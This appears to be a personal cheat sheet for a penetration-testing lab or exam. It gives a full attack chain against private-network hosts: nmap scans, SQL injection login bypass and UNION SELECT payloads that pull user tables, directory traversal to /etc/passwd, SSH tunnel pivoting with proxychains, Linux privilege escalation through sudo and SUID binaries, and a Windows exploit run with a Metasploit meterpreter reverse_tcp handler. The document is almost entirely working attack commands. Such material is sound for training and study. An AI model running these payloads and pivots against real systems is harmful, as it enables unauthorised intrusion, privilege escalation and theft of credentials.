                                                                                                        INPUT ALL SUCCESSFUL COMMANDS AND OUTPUTS INTO A TEXT FILE FOR FUTURE REFERENCE



###scan the IP
        nmap -Pn -T5 10.50.20.96
        nmap -Pn -T5 -p 80 --script=banner,http-enum 10.50.20.96



###Look at the website
        firefox
        10.50.20.96
        10.50.20.96/scripts/
                Download file and look at it
                Open all links
                If there is no /uploads from http-enum UNABLE to upload malware
                if there is a username and password login field use POST SQL injection (tom' OR 1='1)
                if there are products use UNION SELECTION method
                if you see "file to read" use directory traversal
                        look for ../../../../etc/hosts        OR        ../../../../etc/passwd



###CHECK CREDENTIALS
        verify encoding of credentials
                BASE64
                ROT13



###SSH ONTO BOX
        ssh user2@10.50.20.96
                Enumerate file system



###Scan Next Network
        for i in {1..254} ;do (ping -c 1 192.168.28.$i | grep "bytes from" &2>/dev/null) ;done



###Create a tunnel and ssh into box
        ssh -MS /tmp/initial_box user2@10.50.20.96
        ssh -S /tmp/initial_box -O forward -D 9050



###Scan each IP
        proxychains nmap -Pn -T5 192.168.28.172,181
        proxychains nmap -Pn -T5 -p 80 --script=banner,http-enum 192.168.28.172,181



###Create a new tunnel and TEAR DOWN THE OLD DYMANIC TUNNEL
        ssh -S /tmp/initial_box -O forward -L 1111:192.168.28.172:80 -L 2222:192.168.28.172:22
        ssh -S /tmp/initial_box -O forward -D 9050
        ssh -S /tmp/initial_box -O forward -L 3333:192.168.28.181:22



###Look at firefox
        127.0.0.1:1111
                open all links
                If there is no /uploads from http-enum UNABLE to upload malware
                if there is a username and password login field use POST SQL injection 
                        username        tom' OR 1='1
                        password        tom' OR 1='1
                if there are products use UNION SELECTION method
                        127.0.0.1:1111/pick.php?product=7 OR 1-1;
                        127.0.0.1:1111/pick.php?product=7 Union SELECT 1,3,2;
                        127.0.0.1:1111/pick.php?product=7 Union SELECT table_schema,column_name,table_name FROM information_schema.columns;
                                CTRL+F for "password"         OR        "users"
                        127.0.0.1:1111/pick.php?product=7 Union SELECT user_id,name,user_name FROM siteusers.users;
                if you see "file to read" use directory traversal
                        look for ../../../../etc/hosts        OR        ../../../../etc/passwd
                        


###SSH into box
        ssh -p 2222 Aaron@127.0.0.1
                Enumerate File System



###Scan network Again to verify There are no others
        for i in {1..254} ;do (ping -c 1 192.168.28.$i | grep "bytes from" &2>/dev/null) ;done



###Escalate Privileges
        sudo -l
                https://gtfobins.github.io
                show verification of escalated privileges
        IF THIS DOES NOT WORK
                find / -type f -perm /6000 -ls 2>/dev/null
                        https://gtfobins.github.io
        IF EVEN THAT DOESN'T WORK
                lin_buff.py (Linux priv escalation)
        Enumerate File System if told to



###Scan any IP that may have been found
        proxychains nmap -Pn -T5 192.168.28.179
        proxychains nmap -Pn -T5 --script=banner 192.168.28.179
        BANNER GRAB ALL PORTS
                proxychains nc 192.168.28.179 9999



###Create a tunnel to connect to Secure Server and Exploit
        ssh -MS /tmp/next_jump -p 2222 Aaron@127.0.0.1
        ssh -S /tmp/next_jump LOGOS -L 9999:192.168.28.179:9999 -L 4444:192.168.28.179:22 -L 3333:192.168.28.179:3389



###USE SHELL CODE EXPLOIT
        secureserver.py (windows priv escalation)
                change s.connect (127.0.0.1,SECURE SERVER TUNNEL PORT)
        use mfconsole
                use exploit multi/handler
                set payload windows/meterpreter/reverse_tcp
                        set LHOST 127.0.0.1
                        set LPORT (msfvenom lport from secureserver.py)
        python secureserver.py
        Enumerate System



###IF neccesary RDP after escalation and downloaded passwords and john














































